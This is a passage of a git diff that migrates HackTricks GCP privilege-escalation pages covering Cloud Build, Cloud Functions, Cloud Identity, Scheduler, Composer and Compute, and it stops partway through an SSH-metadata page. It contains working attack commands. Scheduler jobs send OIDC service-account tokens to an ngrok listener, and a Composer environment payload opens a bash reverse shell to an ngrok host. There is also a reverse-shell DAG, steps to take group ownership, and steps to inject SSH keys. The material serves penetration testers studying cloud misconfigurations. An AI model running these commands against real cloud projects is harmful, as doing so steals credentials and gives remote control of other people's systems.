+{{#include ../../../banners/hacktricks-training.md}}
+
+### Create OAuth Brand and Client
+
+[**According to the docs**](https://cloud.google.com/iap/docs/programmatic-oauth-clients), these are the required permissions:
+
+- `clientauthconfig.brands.list`
+- `clientauthconfig.brands.create`
+- `clientauthconfig.brands.get`
+- `clientauthconfig.clients.create`
+- `clientauthconfig.clients.listWithSecrets`
+- `clientauthconfig.clients.getWithSecret`
+- `clientauthconfig.clients.delete`
+- `clientauthconfig.clients.update`
+
+```bash
+# Create a brand
+gcloud iap oauth-brands list
+gcloud iap oauth-brands create --application_title=APPLICATION_TITLE --support_email=SUPPORT_EMAIL
+# Create a client of the brand
+gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --display_name=NAME
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
similarity index 54%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
index 7cc370693..20d3d8d00 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md
@@ -1,27 +1,14 @@
 # GCP - Cloudbuild Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## cloudbuild
 
 For more information about Cloud Build check:
 
-{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %}
-[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-cloud-build-enum.md
+{{#endref}}
 
 ### `cloudbuild.builds.create`
 
@@ -42,7 +29,6 @@ TODO
 
 With this permission the user can get the **read access token** used to access the repository:
 
-{% code overflow="wrap" %}
 ```bash
 curl -X POST \
      -H "Authorization: Bearer $(gcloud auth print-access-token)" \
@@ -50,13 +36,11 @@ curl -X POST \
      -d '{}' \
      "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadToken"
 ```
-{% endcode %}
 
 ### `cloudbuild.repositories.accessReadWriteToken`
 
 With this permission the user can get the **read and write access token** used to access the repository:
 
-{% code overflow="wrap" %}
 ```bash
 curl -X POST \
      -H "Authorization: Bearer $(gcloud auth print-access-token)" \
@@ -64,31 +48,15 @@ curl -X POST \
      -d '{}' \
      "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadWriteToken"
 ```
-{% endcode %}
 
 ### `cloudbuild.connections.fetchLinkableRepositories`
 
 With this permission you can **get the repos the connection has access to:**
 
-{% code overflow="wrap" %}
 ```bash
 curl -X GET \
      -H "Authorization: Bearer $(gcloud auth print-access-token)" \
      "https://cloudbuild.googleapis.com/v2/projects//locations//connections/:fetchLinkableRepositories"
 ```
-{% endcode %}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
similarity index 57%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
index 7d4c10c24..69b7d7841 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
@@ -1,27 +1,14 @@
 # GCP - Cloudfunctions Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## cloudfunctions
 
 More information about Cloud Functions:
 
-{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %}
-[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-cloud-functions-enum.md
+{{#endref}}
 
 ### `cloudfunctions.functions.create` , `cloudfunctions.functions.sourceCodeSet`_,_ `iam.serviceAccounts.actAs`
 
@@ -34,9 +21,8 @@ Exploit scripts for this method can be found [here](https://github.com/RhinoSecu
 
 An attacker with these privileges can **modify the code of a Function and even modify the service account attached** with the goal of exfiltrating the token.
 
-{% hint style="danger" %}
-In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image.
-{% endhint %}
+> [!CAUTION]
+> In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image.
 
 Some extra privileges like `.call` permission for version 1 cloudfunctions or the role `role/run.invoker` to trigger the function might be required.
 
@@ -70,9 +56,8 @@ gcloud functions deploy  \
 gcloud functions call 
 ```
 
-{% hint style="danger" %}
-If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it.
-{% endhint %}
+> [!CAUTION]
+> If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it.
 
 The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).
 
@@ -80,7 +65,6 @@ The exploit script for this method can be found [here](https://github.com/RhinoS
 
 With this permission you can get a **signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)**
 
-{% code overflow="wrap" %}
 ```bash
 # Generate the URL
 curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \
@@ -88,7 +72,6 @@ curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/loca
 -H "Content-Type: application/json" \
 -d '{}'
 ```
-{% endcode %}
 
 Not really sure how useful only this permission is from an attackers perspective, but good to know.
 
@@ -106,17 +89,16 @@ If you have read and write access over the bucket you can monitor changes in the
 
 You can check more about the attack in:
 
-{% content-ref url="gcp-storage-privesc.md" %}
-[gcp-storage-privesc.md](gcp-storage-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-storage-privesc.md
+{{#endref}}
 
 However, you cannot use this to pre-compromise third party Cloud Functions because if you create the bucket in your account and give it public permissions so the external project can write over it, you get the following error:
 
-

+

 
-{% hint style="danger" %}
-However, this could be used for DoS attacks.
-{% endhint %}
+> [!CAUTION]
+> However, this could be used for DoS attacks.
 
 ### Read & Write Access over Artifact Registry
 
@@ -124,19 +106,6 @@ When a Cloud Function is created a new docker image is pushed to the Artifact Re
 
 ## References
 
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md
new file mode 100644
index 000000000..f851a05d7
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md
@@ -0,0 +1,34 @@
+# GCP - Cloudidentity Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloudidentity
+
+For more information about the cloudidentity service, check this page:
+
+{{#ref}}
+../gcp-services/gcp-iam-and-org-policies-enum.md
+{{#endref}}
+
+### Add yourself to a group
+
+If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group:
+
+```bash
+gcloud identity groups memberships add --group-email  --member-email  [--roles OWNER]
+# If --roles isn't specified you will get MEMBER
+```
+
+### Modify group membership
+
+If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of:
+
+```bash
+# Check the current membership level
+gcloud identity groups memberships describe --member-email  --group-email 
+
+# If not OWNER try
+gcloud identity groups memberships modify-membership-roles --group-email  --member-email  --add-roles=OWNER
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
similarity index 64%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
index 72ae9590c..ed5dfa4ef 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
@@ -1,53 +1,36 @@
 # GCP - Cloud Scheduler Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Cloud Scheduler
 
 More information in:
 
-{% content-ref url="../gcp-services/gcp-cloud-scheduler-enum.md" %}
-[gcp-cloud-scheduler-enum.md](../gcp-services/gcp-cloud-scheduler-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-cloud-scheduler-enum.md
+{{#endref}}
 
 ### `cloudscheduler.jobs.create` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)
 
 An attacker with these permissions could exploit **Cloud Scheduler** to **authenticate cron jobs as a specific Service Account**. By crafting an HTTP POST request, the attacker schedules actions, like creating a Storage bucket, to execute under the Service Account's identity. This method leverages the **Scheduler's ability to target `*.googleapis.com` endpoints and authenticate requests**, allowing the attacker to manipulate Google API endpoints directly using a simple `gcloud` command.
 
-* **Contact  any google API via`googleapis.com` with OAuth token header**
+- **Contact any google API via`googleapis.com` with OAuth token header**
 
 Create a new Storage bucket:
 
-{% code overflow="wrap" %}
 ```bash
 gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1
 ```
-{% endcode %}
 
 To escalate privileges, an **attacker merely crafts an HTTP request targeting the desired API, impersonating the specified Service Account**
 
-* **Exfiltrate OIDC service account token**
+- **Exfiltrate OIDC service account token**
 
-{% code overflow="wrap" %}
 ```bash
 gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
 
 # Listen in the ngrok address to get the OIDC token in clear text.
 ```
-{% endcode %}
 
 If you need to check the HTTP response you might just t**ake a look at the logs of the execution**.
 
@@ -55,17 +38,14 @@ If you need to check the HTTP response you might just t**ake a look at the logs
 
 Like in the previous scenario it's possible to **update an already created scheduler** to steal the token or perform actions. For example:
 
-{% code overflow="wrap" %}
 ```bash
 gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
 
 # Listen in the ngrok address to get the OIDC token in clear text.
 ```
-{% endcode %}
 
 Another example to upload a private key to a SA and impersonate it:
 
-{% code overflow="wrap" %}
 ```bash
 # Generate local private key
 openssl req -x509 -nodes -newkey rsa:2048 -days 365 \
@@ -129,23 +109,9 @@ EOF
 # Activate the generated key
 gcloud auth activate-service-account --key-file=/tmp/lab.json
 ```
-{% endcode %}
 
 ## References
 
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
similarity index 58%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
index 525674236..5b5e8283e 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md
@@ -1,27 +1,14 @@
 # GCP - Composer Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## composer
 
 More info in:
 
-{% content-ref url="../gcp-services/gcp-composer-enum.md" %}
-[gcp-composer-enum.md](../gcp-services/gcp-composer-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-composer-enum.md
+{{#endref}}
 
 ### `composer.environments.create`
 
@@ -40,7 +27,6 @@ More info about the exploitation [**here**](https://github.com/carlospolop/gcp_p
 
 It's possible to update composer environment, for example, modifying env variables:
 
-{% code overflow="wrap" %}
 ```bash
 # Even if it says you don't have enough permissions the update happens
 gcloud composer environments update \
@@ -63,7 +49,6 @@ X-Allowed-Locations: 0x0
 
 {"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}}
 ```
-{% endcode %}
 
 TODO: Get RCE by adding new pypi packages to the environment
 
@@ -71,28 +56,23 @@ TODO: Get RCE by adding new pypi packages to the environment
 
 Check the source code of the dags being executed:
 
-{% code overflow="wrap" %}
 ```bash
 mkdir /tmp/dags
 gcloud composer environments storage dags export --environment  --location  --destination /tmp/dags
 ```
-{% endcode %}
 
 ### Import Dags
 
 Add the python DAG code into a file and import it running:
 
-{% code overflow="wrap" %}
 ```bash
 # TODO: Create dag to get a rev shell
 gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py
 ```
-{% endcode %}
 
 Reverse shell DAG:
 
-{% code title="reverse_shell.py" %}
-```python
+```python:reverse_shell.py
 import airflow
 from airflow import DAG
 from airflow.operators.bash_operator import BashOperator
@@ -123,7 +103,6 @@ t1 = BashOperator(
     priority_weight=2**31 - 1,
     do_xcom_push=False)
 ```
-{% endcode %}
 
 ### Write Access to the Composer bucket
 
@@ -131,9 +110,9 @@ All the components of a composer environments (DAGs, plugins and data) are store
 
 Get more info about this attack in:
 
-{% content-ref url="gcp-storage-privesc.md" %}
-[gcp-storage-privesc.md](gcp-storage-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-storage-privesc.md
+{{#endref}}
 
 ### Import Plugins
 
@@ -143,17 +122,4 @@ TODO: Check what is possible to compromise by uploading plugins
 
 TODO: Check what is possible to compromise by uploading data
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
similarity index 56%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
index 2805df582..774b0c3ff 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
@@ -1,45 +1,31 @@
 # GCP - Compute Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Compute
 
 For more information about Compute and VPC (netowork) in GCP check:
 
-{% content-ref url="../../gcp-services/gcp-compute-instances-enum/" %}
-[gcp-compute-instances-enum](../../gcp-services/gcp-compute-instances-enum/)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-services/gcp-compute-instances-enum/
+{{#endref}}
 
-{% hint style="danger" %}
-Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached!
-{% endhint %}
+> [!CAUTION]
+> Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached!
 
 ### `compute.projects.setCommonInstanceMetadata`
 
 With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\
 Limitations:
 
-* Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
-* You will need to be **able to contact the SSH** server to login
+- Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
+- You will need to be **able to contact the SSH** server to login
 
 For more information about how to exploit this permission check:
 
-{% content-ref url="gcp-add-custom-ssh-metadata.md" %}
-[gcp-add-custom-ssh-metadata.md](gcp-add-custom-ssh-metadata.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-add-custom-ssh-metadata.md
+{{#endref}}
 
 You could aslo perform this attack by adding new startup-script and rebooting the instance:
 
@@ -79,17 +65,15 @@ gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE
 
 If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance.
 
-{% hint style="success" %}
-In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.
-{% endhint %}
+> [!TIP]
+> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.
 
 ### **`compute.instances.osAdminLogin`**
 
 If **OSLogin is enabled in the instanc**e, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance.
 
-{% hint style="success" %}
-In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.
-{% endhint %}
+> [!TIP]
+> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM.
 
 ### `compute.instances.create`,`iam.serviceAccounts.actAs, compute.disks.create`, `compute.instances.create`, `compute.instances.setMetadata`, `compute.instances.setServiceAccount`, `compute.subnetworks.use`, `compute.subnetworks.useExternalIp`
 
@@ -106,7 +90,6 @@ Note that at the moment you **don't need `actAs` permission** over the SA attach
 If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)**.**\
 For a patch job run:
 
-{% code overflow="wrap" %}
 ```python
 cat > /tmp/patch-job.sh <[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
new file mode 100644
index 000000000..f0d3982df
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md
@@ -0,0 +1,100 @@
+# GCP - Add Custom SSH Metadata
+
+## GCP - Add Custom SSH Metadata
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+### Modifying the metadata 
+
+Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**.
+
+#### **Incorporation of SSH Keys into Custom Metadata**
+
+On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**.
+
+Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host.
+
+#### **Add SSH key to existing privileged user**
+
+1. **Examine Existing SSH Keys on the Instance:**
+
+   - Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key.
+
+     ```bash
+     gcloud compute instances describe [INSTANCE] --zone [ZONE]
+     ```
+
+   - Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon.
+
+2. **Prepare a Text File for SSH Key Metadata:**
+   - Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones.
+3. **Generate a New SSH Key for the Target User (`alice` in this example):**
+
+   - Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username.
+
+     ```bash
+     ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub
+     ```
+
+   - Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata.
+
+4. **Update the Instance's SSH Key Metadata:**
+
+   - Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command.
+
+     ```bash
+     gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
+     ```
+
+5. **Access the Instance Using the New SSH Key:**
+
+   - Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example).
+
+     ```bash
